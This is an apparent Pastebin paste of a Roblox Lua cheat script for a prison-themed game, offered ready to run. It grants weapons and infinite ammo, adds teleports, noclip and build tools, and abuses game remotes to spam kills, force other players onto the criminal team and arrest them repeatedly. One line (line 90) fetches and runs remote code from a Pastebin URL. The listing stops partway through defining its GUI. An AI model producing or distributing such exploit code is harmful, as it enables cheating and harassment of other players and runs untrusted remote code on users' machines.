Homestyle_chicken

aw yis

Apr 23rd, 2020
151
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 45.41 KB | None | 0 0
  1. game.Players.LocalPlayer:GetMouse().KeyDown:connect(function(key)
  2. if key == 'z' then
  3. saved = game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame
  4. local A_1 = "LocalPlayer"
  5.  
  6. local Event = game:GetService("Workspace").Remote.loadchar
  7. Event:InvokeServer(A_1)
  8.  
  9. game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = saved
  10. end
  11. end)
  12. game.Players.LocalPlayer:GetMouse().KeyDown:connect(function(key)
  13. if key == 'v' then
  14. game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = game:GetService("Players").Shadows_Overlord.Character.HumanoidRootPart.CFrame
  15. end
  16. end)
  17. local slot1={"M4A1"}
  18. local slot2={"Remington 870"}
  19. local slot3={"M9"}
  20. wait(0.01)
  21. for Y,Z in pairs(workspace.Prison_ITEMS.giver:GetChildren())do if Z.Name==slot1[1]then local lol=workspace.Remote.ItemHandler:InvokeServer(Z.ITEMPICKUP)end end
  22. wait(0.1)
  23. for Y,Z in pairs(workspace.Prison_ITEMS.giver:GetChildren())do if Z.Name==slot2[1]then local lol=workspace.Remote.ItemHandler:InvokeServer(Z.ITEMPICKUP)end end
  24. wait(0.1)
  25. for Y,Z in pairs(workspace.Prison_ITEMS.giver:GetChildren())do if Z.Name==slot3[1]then local lol=workspace.Remote.ItemHandler:InvokeServer(Z.ITEMPICKUP)end end
  26. wait(0.1)
  27. local player = game:GetService("Players").LocalPlayer
  28. local gun = player.Backpack:FindFirstChild("M9")
  29. local sM = require(gun:FindFirstChild("GunStates"))
  30. sM["MaxAmmo"] = math.huge
  31. sM["StoredAmmo"] = math.huge
  32. sM["AmmoPerClip"] = math.huge
  33. sM["CurrentAmmo"] = math.huge
  34.  
  35. local player = game:GetService("Players").LocalPlayer
  36. local gun = player.Backpack:FindFirstChild("M4A1")
  37. local sM = require(gun:FindFirstChild("GunStates"))
  38. sM["MaxAmmo"] = math.huge
  39. sM["StoredAmmo"] = math.huge
  40. sM["AmmoPerClip"] = math.huge
  41. sM["CurrentAmmo"] = math.huge
  42.  
  43. local player = game:GetService("Players").LocalPlayer
  44. local gun = player.Backpack:FindFirstChild("Remington 870")
  45. local sM = require(gun:FindFirstChild("GunStates"))
  46. sM["MaxAmmo"] = math.huge
  47. sM["StoredAmmo"] = math.huge
  48. sM["AmmoPerClip"] = math.huge
  49. sM["CurrentAmmo"] = math.huge
  50.  
  51. game.Players.LocalPlayer.CharacterAdded:Connect(function(Character)
  52. wait(0.01)
  53. for Y,Z in pairs(workspace.Prison_ITEMS.giver:GetChildren())do if Z.Name==slot1[1]then local lol=workspace.Remote.ItemHandler:InvokeServer(Z.ITEMPICKUP)end end
  54. wait(0.1)
  55. for Y,Z in pairs(workspace.Prison_ITEMS.giver:GetChildren())do if Z.Name==slot2[1]then local lol=workspace.Remote.ItemHandler:InvokeServer(Z.ITEMPICKUP)end end
  56. wait(0.1)
  57. for Y,Z in pairs(workspace.Prison_ITEMS.giver:GetChildren())do if Z.Name==slot3[1]then local lol=workspace.Remote.ItemHandler:InvokeServer(Z.ITEMPICKUP)end end
  58. wait(0.1)
  59. local player = game:GetService("Players").LocalPlayer
  60. local gun = player.Backpack:FindFirstChild("M9")
  61. local sM = require(gun:FindFirstChild("GunStates"))
  62. sM["MaxAmmo"] = math.huge
  63. sM["StoredAmmo"] = math.huge
  64. sM["AmmoPerClip"] = math.huge
  65. sM["CurrentAmmo"] = math.huge
  66.  
  67. local player = game:GetService("Players").LocalPlayer
  68. local gun = player.Backpack:FindFirstChild("M4A1")
  69. local sM = require(gun:FindFirstChild("GunStates"))
  70. sM["MaxAmmo"] = math.huge
  71. sM["StoredAmmo"] = math.huge
  72. sM["AmmoPerClip"] = math.huge
  73. sM["CurrentAmmo"] = math.huge
  74.  
  75. local player = game:GetService("Players").LocalPlayer
  76. local gun = player.Backpack:FindFirstChild("Remington 870")
  77. local sM = require(gun:FindFirstChild("GunStates"))
  78. sM["MaxAmmo"] = math.huge
  79. sM["StoredAmmo"] = math.huge
  80. sM["AmmoPerClip"] = math.huge
  81. sM["CurrentAmmo"] = math.huge
  82. end)
  83. game:GetService("StarterGui"):SetCore("ChatMakeSystemMessage", {
  84. Text = "loaded cuteness only gui successfully, enjoy! made by your one and only soulmate <3",
  85. Color = Color3.new(0,0,0),
  86. FontSize = Enum.FontSize.Size24,
  87. })
  88. wait(0.1)
  89. mainRemotes = game.ReplicatedStorage meleeRemote = mainRemotes['meleeEvent'] mouse = game.Players.LocalPlayer:GetMouse() punching = false cooldown = false function punch() cooldown = true local part = Instance.new("Part", game.Players.LocalPlayer.Character) part.Transparency = 1 part.Size = Vector3.new(5,2,3) part.CanCollide = false local w1 = Instance.new("Weld", part) w1.Part0 = game.Players.LocalPlayer.Character.Torso w1.Part1 = part w1.C1 = CFrame.new(0,0,2) part.Touched:connect(function(hit) if game.Players:FindFirstChild(hit.Parent.Name) then local plr = game.Players:FindFirstChild(hit.Parent.Name) if plr.Name ~= game.Players.LocalPlayer.Name then part:Destroy() for i = 1,100 do meleeRemote:FireServer(plr) end end end end) wait(1) cooldown = false part:Destroy() end mouse.KeyDown:connect(function(key) if cooldown == false then if key:lower() == "f" then punch() end end end)
  90. loadstring(game:HttpGet("https://pastebin.com/raw/wZKfd67F"))()
  91.  
  92. local ScreenGui = Instance.new("ScreenGui")
  93. local Frame = Instance.new("Frame")
  94. local on = Instance.new("TextButton")
  95. local off = Instance.new("TextButton")
  96.  
  97. --Properties:
  98.  
  99. ScreenGui.Parent = game.CoreGui
  100.  
  101. Frame.Parent = ScreenGui
  102. Frame.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  103. Frame.Position = UDim2.new(0.0543615669, 0, 0.879947186, 0)
  104. Frame.Size = UDim2.new(0, 105, 0, 31)
  105.  
  106. on.Name = "on"
  107. on.Parent = Frame
  108. on.BackgroundColor3 = Color3.fromRGB(0, 255, 0)
  109. on.Size = UDim2.new(0, 105, 0, 31)
  110. on.Font = Enum.Font.SourceSans
  111. on.Text = "auto respawn on"
  112. on.TextColor3 = Color3.fromRGB(0, 0, 0)
  113. on.TextSize = 14.000
  114. on.Visible = false
  115. on.MouseButton1Down:Connect(function()
  116. on.Visible = false
  117. off.Visible = true
  118.  
  119. local blah = (game.Players.LocalPlayer.Name)
  120.  
  121. _G.Looop = false
  122.  
  123. while _G.Looop == true do wait(0.1)
  124. if game:GetService("Workspace")[blah].Humanoid.Health == 0 then
  125. saved = game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame
  126. local A_1 = "LocalPlayer"
  127.  
  128. local Event = game:GetService("Workspace").Remote.loadchar
  129. Event:InvokeServer(A_1)
  130.  
  131. game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = saved
  132. end
  133. end
  134. end)
  135.  
  136. off.Name = "off"
  137. off.Parent = Frame
  138. off.BackgroundColor3 = Color3.fromRGB(255, 0, 4)
  139. off.Size = UDim2.new(0, 105, 0, 31)
  140. off.Font = Enum.Font.SourceSans
  141. off.Text = "auto respawn off"
  142. off.TextColor3 = Color3.fromRGB(0, 0, 0)
  143. off.TextSize = 14.000
  144. off.Visible = true
  145. off.MouseButton1Down:Connect(function()
  146. off.Visible = false
  147. on.Visible = true
  148.  
  149. local blah = (game.Players.LocalPlayer.Name)
  150.  
  151. _G.Looop = true
  152.  
  153. while _G.Looop == true do wait(0.1)
  154. if game:GetService("Workspace")[blah].Humanoid.Health == 0 then
  155. saved = game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame
  156. local A_1 = "LocalPlayer"
  157.  
  158. local Event = game:GetService("Workspace").Remote.loadchar
  159. Event:InvokeServer(A_1)
  160.  
  161. game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = saved
  162. end
  163. end
  164. end)
  165.  
  166. local ScreenGui = Instance.new("ScreenGui")
  167. local ui = Instance.new("Frame")
  168. local guards = Instance.new("TextButton")
  169. local inmate = Instance.new("TextButton")
  170. local criminal = Instance.new("TextButton")
  171. local neutral = Instance.new("TextButton")
  172. local btools = Instance.new("TextButton")
  173. local tpspot = Instance.new("TextButton")
  174.  
  175. --Properties:
  176.  
  177. ScreenGui.Parent = game.CoreGui
  178.  
  179. ui.Name = "ui"
  180. ui.Parent = ScreenGui
  181. ui.BackgroundColor3 = Color3.fromRGB(182, 0, 0)
  182. ui.BorderColor3 = Color3.fromRGB(182, 0, 0)
  183. ui.Position = UDim2.new(0.643489122, 0, 0.71767813, 0)
  184. ui.Size = UDim2.new(0, 186, 0, 115)
  185. ui.Active = true
  186. ui.Visible = true
  187. ui.Draggable = true
  188.  
  189. guards.Name = "guards"
  190. guards.Parent = ui
  191. guards.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
  192. guards.BorderColor3 = Color3.fromRGB(0, 0, 0)
  193. guards.Position = UDim2.new(0.0414507464, 0, 0.0740738586, 0)
  194. guards.Size = UDim2.new(0, 85, 0, 30)
  195. guards.Font = Enum.Font.SourceSans
  196. guards.Text = "guards"
  197. guards.TextColor3 = Color3.fromRGB(182, 0, 0)
  198. guards.TextSize = 14.000
  199. guards.MouseButton1Down:connect(function()
  200. workspace.Remote.TeamEvent:FireServer("Bright blue")
  201. end)
  202.  
  203. inmate.Name = "inmate"
  204. inmate.Parent = ui
  205. inmate.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
  206. inmate.BorderColor3 = Color3.fromRGB(0, 0, 0)
  207. inmate.Position = UDim2.new(0.518134654, 0, 0.0796609595, 0)
  208. inmate.Size = UDim2.new(0, 85, 0, 29)
  209. inmate.Font = Enum.Font.SourceSans
  210. inmate.Text = "inmate"
  211. inmate.TextColor3 = Color3.fromRGB(182, 0, 0)
  212. inmate.TextSize = 14.000
  213. inmate.MouseButton1Down:connect(function()
  214. workspace.Remote.TeamEvent:FireServer("Bright orange")
  215. end)
  216.  
  217. criminal.Name = "criminal"
  218. criminal.Parent = ui
  219. criminal.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
  220. criminal.BorderColor3 = Color3.fromRGB(0, 0, 0)
  221. criminal.Position = UDim2.new(0.0414507762, 0, 0.342592597, 0)
  222. criminal.Size = UDim2.new(0, 85, 0, 31)
  223. criminal.Font = Enum.Font.SourceSans
  224. criminal.Text = "criminal"
  225. criminal.TextColor3 = Color3.fromRGB(182, 0, 0)
  226. criminal.TextSize = 14.000
  227. criminal.MouseButton1Down:connect(function()
  228. local Apart = Instance.new("Part")
  229.  
  230. Apart.Name = "PlrsPos"
  231. Apart.Parent = workspace
  232. Apart.Anchored = true
  233. Apart.Archivable = true
  234. Apart.CFrame = CFrame.new(9e99, 9e99, 9e99)
  235.  
  236. LCS = game.Workspace["Criminals Spawn"].SpawnLocation
  237.  
  238. _G.killAura = true
  239. wait(0.2)
  240.  
  241. Apart.CFrame = game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame
  242. Apart.Transparency = 1
  243. Apart.Anchored = true
  244. Apart.CanCollide = false
  245.  
  246. istptoplr = true
  247. wait(0.004)
  248.  
  249.  
  250. LCS = game.Workspace["Criminals Spawn"].SpawnLocation
  251.  
  252. LCS.CanCollide = false
  253. LCS.Size = Vector3.new(51.05, 24.12, 54.76)
  254. LCS.CFrame = game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame
  255. LCS.Transparency = 1
  256.  
  257. wait(2)
  258.  
  259. istptoplr = false
  260. _G.killAura = false
  261.  
  262. wait(0.04)
  263.  
  264. if istptoplr == false then
  265. LCS.CFrame = CFrame.new(-920.510803, 92.2271957, 2138.27002, 0, 0, -1, 0, 1, 0, 1, 0, 0)
  266. LCS.Size = Vector3.new(6, 0.2, 6)
  267. LCS.Transparency = 0
  268. istptoplr = false
  269. end
  270. end)
  271.  
  272. neutral.Name = "neutral"
  273. neutral.Parent = ui
  274. neutral.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
  275. neutral.BorderColor3 = Color3.fromRGB(0, 0, 0)
  276. neutral.Position = UDim2.new(0.518134654, 0, 0.334943414, 0)
  277. neutral.Size = UDim2.new(0, 85, 0, 31)
  278. neutral.Font = Enum.Font.SourceSans
  279. neutral.Text = "neutral"
  280. neutral.TextColor3 = Color3.fromRGB(182, 0, 0)
  281. neutral.TextSize = 14.000
  282. neutral.MouseButton1Down:connect(function()
  283. workspace.Remote.TeamEvent:FireServer("Medium stone grey")
  284. end)
  285.  
  286. btools.Name = "btools"
  287. btools.Parent = ui
  288. btools.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
  289. btools.BorderColor3 = Color3.fromRGB(0, 0, 0)
  290. btools.Position = UDim2.new(0.0414507464, 0, 0.612157643, 0)
  291. btools.Size = UDim2.new(0, 85, 0, 29)
  292. btools.Font = Enum.Font.SourceSans
  293. btools.Text = "btools"
  294. btools.TextColor3 = Color3.fromRGB(182, 0, 0)
  295. btools.TextSize = 14.000
  296. btools.MouseButton1Down:connect(function()
  297. local tool1 = Instance.new("HopperBin",game.Players.LocalPlayer.Backpack)
  298. local tool2 = Instance.new("HopperBin",game.Players.LocalPlayer.Backpack)
  299. local tool3 = Instance.new("HopperBin",game.Players.LocalPlayer.Backpack)
  300. local tool4 = Instance.new("HopperBin",game.Players.LocalPlayer.Backpack)
  301. local tool5 = Instance.new("HopperBin",game.Players.LocalPlayer.Backpack)
  302. tool1.BinType = "Clone"
  303. tool2.BinType = "GameTool"
  304. tool3.BinType = "Hammer"
  305. tool4.BinType = "Script"
  306. tool5.BinType = "Grab"
  307. end)
  308.  
  309. tpspot.Name = "tpspot"
  310. tpspot.Parent = ui
  311. tpspot.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
  312. tpspot.BorderColor3 = Color3.fromRGB(0, 0, 0)
  313. tpspot.Position = UDim2.new(0.518134654, 0, 0.612157643, 0)
  314. tpspot.Size = UDim2.new(0, 85, 0, 29)
  315. tpspot.Font = Enum.Font.SourceSans
  316. tpspot.Text = "cutie spot ^-^"
  317. tpspot.TextColor3 = Color3.fromRGB(182, 0, 0)
  318. tpspot.TextSize = 14.000
  319. tpspot.MouseButton1Down:connect(function()
  320. game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(955.16217, 101.498436, 2360.60303, -0.0048833508, -0.0168602243, 0.999845982, -7.27595761e-12, 0.999857962, 0.0168604236, -0.999988139, 8.23353548e-05, -0.0048826565)
  321. end)
  322.  
  323.  
  324. noclip = false
  325. game:GetService('RunService').Stepped:connect(function()
  326. if noclip then
  327. game.Players.LocalPlayer.Character.Humanoid:ChangeState(11)
  328. end
  329. end)
  330.  
  331. plr = game.Players.LocalPlayer
  332. mouse = plr:GetMouse()
  333. mouse.KeyDown:connect(function(key)
  334.  
  335. if key == "m" then
  336. noclip = not noclip
  337. game.Players.LocalPlayer.Character.Humanoid:ChangeState(11)
  338. end
  339. end)
  340.  
  341. local tp = Instance.new("ScreenGui")
  342. local gui = Instance.new("Frame")
  343. local b = Instance.new("TextButton")
  344. local sr = Instance.new("TextButton")
  345. local cb = Instance.new("TextButton")
  346. local r = Instance.new("TextButton")
  347. local bb = Instance.new("TextButton")
  348. local c = Instance.new("TextButton")
  349. local s = Instance.new("TextButton")
  350.  
  351. tp.Name = "tp"
  352. tp.Parent = game.CoreGui
  353.  
  354. gui.Name = "tpsyes"
  355. gui.Parent = tp
  356. gui.BackgroundColor3 = Color3.fromRGB(255, 0, 0)
  357. gui.Position = UDim2.new(0.0973451361, 0, 0.509234846, 0)
  358. gui.Size = UDim2.new(0, 100, 0, 211)
  359. gui.Active = true
  360. gui.Visible = true
  361. gui.Draggable = true
  362.  
  363. b.Name = "b"
  364. b.Parent = gui
  365. b.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
  366. b.BorderColor3 = Color3.fromRGB(0, 0, 0)
  367. b.Position = UDim2.new(0, 0, 0.109004736, 0)
  368. b.Size = UDim2.new(0, 100, 0, 28)
  369. b.Font = Enum.Font.SourceSans
  370. b.Text = "away from the things"
  371. b.TextColor3 = Color3.fromRGB(255, 0, 0)
  372. b.TextSize = 14.000
  373. b.MouseButton1Down:connect(function()
  374. game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(778.159485, 397.750305, 2673.24878, 0.999851763, 0.000356296339, -0.0172140822, 0, 0.9997859, 0.0206935257, 0.0172177684, -0.0206904579, 0.999637663)
  375. end)
  376.  
  377. sr.Name = "sr"
  378. sr.Parent = gui
  379. sr.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
  380. sr.BorderColor3 = Color3.fromRGB(0, 0, 0)
  381. sr.Position = UDim2.new(0, 0, 0.245800346, 0)
  382. sr.Size = UDim2.new(0, 100, 0, 26)
  383. sr.Font = Enum.Font.SourceSans
  384. sr.Text = "shh, it's a secret"
  385. sr.TextColor3 = Color3.fromRGB(255, 0, 0)
  386. sr.TextSize = 14.000
  387. sr.MouseButton1Down:connect(function()
  388. game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(704.688538, 101.667862, 2363.14575, 0.00783675071, -0.355700761, 0.934567094, 0, 0.934595883, 0.355711669, -0.999969363, -0.00278762379, 0.0073241936)
  389. end)
  390.  
  391. cb.Name = "cb"
  392. cb.Parent = gui
  393. cb.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
  394. cb.BorderColor3 = Color3.fromRGB(0, 0, 0)
  395. cb.Position = UDim2.new(0, 0, 0.370619953, 0)
  396. cb.Size = UDim2.new(0, 100, 0, 26)
  397. cb.Font = Enum.Font.SourceSans
  398. cb.Text = "partners in crime"
  399. cb.TextColor3 = Color3.fromRGB(255, 0, 0)
  400. cb.TextSize = 14.000
  401. cb.MouseButton1Down:connect(function()
  402. game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(-884.53241, 95.5009003, 2093.2207, 0.00878979545, 0.0107267927, -0.999903917, 7.27595675e-12, 0.999942541, 0.0107272072, 0.999961376, -9.42899642e-05, 0.00878929067)
  403. end)
  404.  
  405. r.Name = "r"
  406. r.Parent = gui
  407. r.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
  408. r.BorderColor3 = Color3.fromRGB(0, 0, 0)
  409. r.Position = UDim2.new(0, 0, 0.495439529, 0)
  410. r.Size = UDim2.new(0, 100, 0, 26)
  411. r.Font = Enum.Font.SourceSans
  412. r.Text = "roof"
  413. r.TextColor3 = Color3.fromRGB(255, 0, 0)
  414. r.TextSize = 14.000
  415. r.MouseButton1Down:connect(function()
  416. game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(-324.209503, 120.399216, 2000.33313, 0.622232556, 0.0945220515, -0.777105093, 3.7252903e-09, 0.992683768, 0.120743647, 0.782832503, -0.0751306266, 0.617680132)
  417. end)
  418.  
  419. bb.Name = "bb"
  420. bb.Parent = gui
  421. bb.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
  422. bb.BorderColor3 = Color3.fromRGB(0, 0, 0)
  423. bb.Position = UDim2.new(0, 0, 0.620259047, 0)
  424. bb.Size = UDim2.new(0, 100, 0, 26)
  425. bb.Font = Enum.Font.SourceSans
  426. bb.Text = "none shall find us"
  427. bb.TextColor3 = Color3.fromRGB(255, 0, 0)
  428. bb.TextSize = 14.000
  429. bb.MouseButton1Down:connect(function()
  430. game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(-76.1511536, 12.5858622, 1343.43945, 0.0337036364, 0.026914563, 0.999069452, 5.8207654e-11, 0.999637425, -0.0269298609, -0.999431908, 0.000907634327, 0.0336914137)
  431. end)
  432.  
  433. c.Name = "c"
  434. c.Parent = gui
  435. c.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
  436. c.BorderColor3 = Color3.fromRGB(0, 0, 0)
  437. c.Position = UDim2.new(0, 0, 0.745078743, 0)
  438. c.Size = UDim2.new(0, 100, 0, 26)
  439. c.Font = Enum.Font.SourceSans
  440. c.Text = "Cuff me daddy"
  441. c.TextColor3 = Color3.fromRGB(255, 0, 0)
  442. c.TextSize = 14.000
  443. c.MouseButton1Down:connect(function()
  444. game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(864.452942, 103.219696, 2481.34448, -0.616908312, 0.0482669026, -0.785553634, 3.7252903e-09, 0.998117805, 0.0613275059, 0.787035108, 0.0378334448, -0.615747094)
  445. end)
  446.  
  447. s.Name = "s"
  448. s.Parent = gui
  449. s.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
  450. s.BorderColor3 = Color3.fromRGB(0, 0, 0)
  451. s.Position = UDim2.new(0, 0, 0.872165203, 0)
  452. s.Size = UDim2.new(0, 100, 0, 26)
  453. s.Font = Enum.Font.SourceSans
  454. s.Text = "commit sewer slide"
  455. s.TextColor3 = Color3.fromRGB(255, 0, 0)
  456. s.TextSize = 14.000
  457. s.MouseButton1Down:connect(function()
  458. game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(939.525269, 99.6879807, 2109.92603, -0.999733806, 0.000122914775, -0.0230760854, 0, 0.999985874, 0.00532642473, 0.0230764132, 0.00532500679, -0.999719501)
  459. end)
  460.  
  461. local guiyes = Instance.new("ScreenGui")
  462. local last = Instance.new("Frame")
  463. local plrs = Instance.new("TextBox")
  464. local crim = Instance.new("TextButton")
  465. local spamon = Instance.new("TextButton")
  466. local spamoff = Instance.new("TextButton")
  467. local kill = Instance.new("TextButton")
  468. local taze = Instance.new("TextButton")
  469. local arrest = Instance.new("TextButton")
  470. local tpto = Instance.new("TextButton")
  471. local killall = Instance.new("TextButton")
  472. local arrestcrims = Instance.new("TextButton")
  473. local cmdx = Instance.new("TextButton")
  474. local fullbright = Instance.new("TextButton")
  475.  
  476. guiyes.Name = "guiyes"
  477. guiyes.Parent = game.CoreGui
  478.  
  479. last.Name = "last"
  480. last.Parent = guiyes
  481. last.BackgroundColor3 = Color3.fromRGB(255, 0, 4)
  482. last.Position = UDim2.new(0.646017671, 0, 0.321899742, 0)
  483. last.Size = UDim2.new(0, 120, 0, 200)
  484. last.Visible = true
  485. last.Active = true
  486. last.Draggable = true
  487.  
  488. plrs.Name = "plrs"
  489. plrs.Parent = last
  490. plrs.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  491. plrs.Position = UDim2.new(0, 0, 0.100000001, 0)
  492. plrs.Size = UDim2.new(0, 120, 0, 28)
  493. plrs.Font = Enum.Font.SourceSans
  494. plrs.Text = ""
  495. plrs.TextColor3 = Color3.new(0,0,0)
  496. plrs.TextSize = 14.000
  497.  
  498. local Players = game:GetService("Players")
  499. local LocalPlayer = Players.LocalPlayer
  500. local function RemoveSpaces(String)
  501. return String:gsub("%s+", "") or String
  502. end
  503.  
  504. local function FindPlayer(String)
  505. String = RemoveSpaces(String)
  506. for _, _Player in pairs(Players:GetPlayers()) do
  507. if _Player.Name:lower():match('^'.. String:lower()) then
  508. return _Player
  509. end
  510. end
  511. return nil
  512. end
  513.  
  514. crim.Name = "crim"
  515. crim.Parent = last
  516. crim.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
  517. crim.Position = UDim2.new(0, 0, 0.239999995, 0)
  518. crim.Size = UDim2.new(0, 60, 0, 30)
  519. crim.Font = Enum.Font.SourceSans
  520. crim.Text = "make crim"
  521. crim.TextColor3 = Color3.fromRGB(255, 0, 4)
  522. crim.TextSize = 14.000
  523. crim.MouseButton1Down:connect(function()
  524. local Apart = Instance.new("Part")
  525.  
  526. Apart.Name = "PlrsPos"
  527. Apart.Parent = workspace
  528. Apart.Anchored = true
  529. Apart.Archivable = true
  530. Apart.CFrame = CFrame.new(9e99, 9e99, 9e99)
  531.  
  532. local lol = FindPlayer(plrs.Text)
  533.  
  534. local A_1 =
  535. {
  536. [1] =
  537. {
  538. ["RayObject"] = Ray.new(Vector3.new(827.412415, 101.489777, 2296.84326), Vector3.new(277.738678, 6.89340925, 287.773712)),
  539. ["Distance"] = 4.7204174995422,
  540. ["Cframe"] = CFrame.new(832.049377, 101.392006, 2300.97168, 0.843892097, -0.0554918349, 0.533635378, 0, 0.994636595, 0.103430569, -0.536512911, -0.0872842371, 0.839366019),
  541. ["Hit"] = lol.Character.Head
  542. },
  543. [2] =
  544. {
  545. ["RayObject"] = Ray.new(Vector3.new(827.412415, 101.489777, 2296.84326), Vector3.new(303.047546, 21.3568707, 260.203888)),
  546. ["Distance"] = 4.8114862442017,
  547. ["Cframe"] = CFrame.new(832.390259, 101.550629, 2300.74097, 0.738044441, -0.112958886, 0.665229917, 7.45057971e-09, 0.985887885, 0.16740793, -0.674752235, -0.123554483, 0.727628946),
  548. ["Hit"] = lol.Character.Head
  549. },
  550. [3] =
  551. {
  552. ["RayObject"] = Ray.new(Vector3.new(827.412415, 101.489777, 2296.84326), Vector3.new(296.800507, 7.00420141, 268.067932)),
  553. ["Distance"] = 4.444625377655,
  554. ["Cframe"] = CFrame.new(832.185486, 101.391617, 2300.70264, 0.775115669, -0.0692948848, 0.628007889, 7.45057971e-09, 0.993967533, 0.109675139, -0.631819367, -0.0850109085, 0.770439863),
  555. ["Hit"] = lol.Character.Head
  556. },
  557. [4] =
  558. {
  559. ["RayObject"] = Ray.new(Vector3.new(827.412415, 101.489777, 2296.84326), Vector3.new(284.930573, 11.9850616, 280.483368)),
  560. ["Distance"] = 4.6211166381836,
  561. ["Cframe"] = CFrame.new(832.10083, 101.445007, 2300.86963, 0.820150614, -0.0735745132, 0.567397356, 0, 0.991697431, 0.128593579, -0.572147667, -0.105466105, 0.81334126),
  562. ["Hit"] = lol.Character.Head
  563. },
  564. [5] =
  565. {
  566. ["RayObject"] = Ray.new(Vector3.new(827.412415, 101.489777, 2296.84326), Vector3.new(294.625824, 2.15741801, 270.538269)),
  567. ["Distance"] = 4.4639973640442,
  568. ["Cframe"] = CFrame.new(832.169434, 101.341301, 2300.73438, 0.784266233, -0.0537625961, 0.618090749, -3.7252903e-09, 0.99623847, 0.086654529, -0.620424569, -0.0679602176, 0.781316102),
  569. ["Hit"] = lol.Character.Head
  570. }
  571. }
  572. local A_2 = game.Players.LocalPlayer.Backpack["Remington 870"]
  573. local Event = game:GetService("ReplicatedStorage").ShootEvent
  574. Event:FireServer(A_1, A_2)
  575.  
  576. workspace.Remote.TeamEvent:FireServer("Bright orange")
  577.  
  578. LCS = game.Workspace["Criminals Spawn"].SpawnLocation
  579.  
  580. _G.killaura = true
  581. wait(0.1)
  582.  
  583. Apart.CFrame = game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame
  584. Apart.Transparency = 1
  585. Apart.Anchored = true
  586. Apart.CanCollide = false
  587. wait(0.1)
  588. game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = lol.Character.HumanoidRootPart.CFrame
  589.  
  590. istptoplr = true
  591. wait(0.004)
  592.  
  593. if game.Players.LocalPlayer.Team.TeamColor == "Bright orange" then
  594. wait(2)
  595. workspace.Remote.TeamEvent:FireServer("Bright orange")
  596. elseif
  597. game.Players.LocalPlayer.Team.TeamColor == "Bright blue" then
  598. workspace.Remote.TeamEvent:FireServer("Bright blue")
  599. end
  600. if istptoplr == true then
  601. while istptoplr do
  602. wait()
  603.  
  604. game.Players.LocalPlayer.Character:FindFirstChild("HumanoidRootPart").CFrame = lol.Character.HumanoidRootPart.CFrame
  605.  
  606. LCS = game.Workspace["Criminals Spawn"].SpawnLocation
  607.  
  608. LCS.CanCollide = false
  609. LCS.Size = Vector3.new(51.05, 24.12, 54.76)
  610. LCS.CFrame = game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame
  611. LCS.Transparency = 1
  612.  
  613. wait(0.1)
  614.  
  615. istptoplr = false
  616. wait(0.04)
  617.  
  618. if istptoplr == false then
  619. LCS.CFrame = CFrame.new(-920.510803, 92.2271957, 2138.27002, 0, 0, -1, 0, 1, 0, 1, 0, 0)
  620. LCS.Size = Vector3.new(6, 0.2, 6)
  621. LCS.Transparency = 0
  622. game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = Apart.CFrame
  623. wait()
  624. istptoplr = false
  625. wait(0.1)
  626. workspace.Remote.TeamEvent:FireServer("Bright orange")
  627. end
  628. end
  629. end
  630. end)
  631.  
  632. spamon.Name = "spamon"
  633. spamon.Parent = last
  634. spamon.BackgroundColor3 = Color3.fromRGB(4, 255, 0)
  635. spamon.Position = UDim2.new(0.5, 0, 0.239999995, 0)
  636. spamon.Size = UDim2.new(0, 60, 0, 30)
  637. spamon.Font = Enum.Font.SourceSans
  638. spamon.Text = "spam on"
  639. spamon.TextColor3 = Color3.fromRGB(0, 0, 0)
  640. spamon.TextSize = 14.000
  641. spamon.Visible = false
  642. spamon.MouseButton1Down:connect(function()
  643. spamon.Visible = false
  644. spamoff.Visible = true
  645.  
  646. local loll = FindPlayer(plrs.Text)
  647. _G.Spam = false
  648. game:GetService("RunService").Heartbeat:Connect(function()
  649. if _G.Spam == true then
  650. if loll and loll.Character then
  651. while _G.Spam == true do wait()
  652. workspace.Remote.arrest:InvokeServer(loll.Character.Torso)
  653. game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = loll.Character.HumanoidRootPart.CFrame
  654. end
  655. end
  656. end
  657. end)
  658. end)
  659.  
  660. spamoff.Name = "spamoff"
  661. spamoff.Parent = last
  662. spamoff.BackgroundColor3 = Color3.fromRGB(255, 0, 4)
  663. spamoff.Position = UDim2.new(0.5, 0, 0.239999995, 0)
  664. spamoff.Size = UDim2.new(0, 60, 0, 30)
  665. spamoff.Font = Enum.Font.SourceSans
  666. spamoff.Text = "spam off"
  667. spamoff.TextColor3 = Color3.fromRGB(0, 0, 0)
  668. spamoff.TextSize = 14.000
  669. spamoff.Visible = true
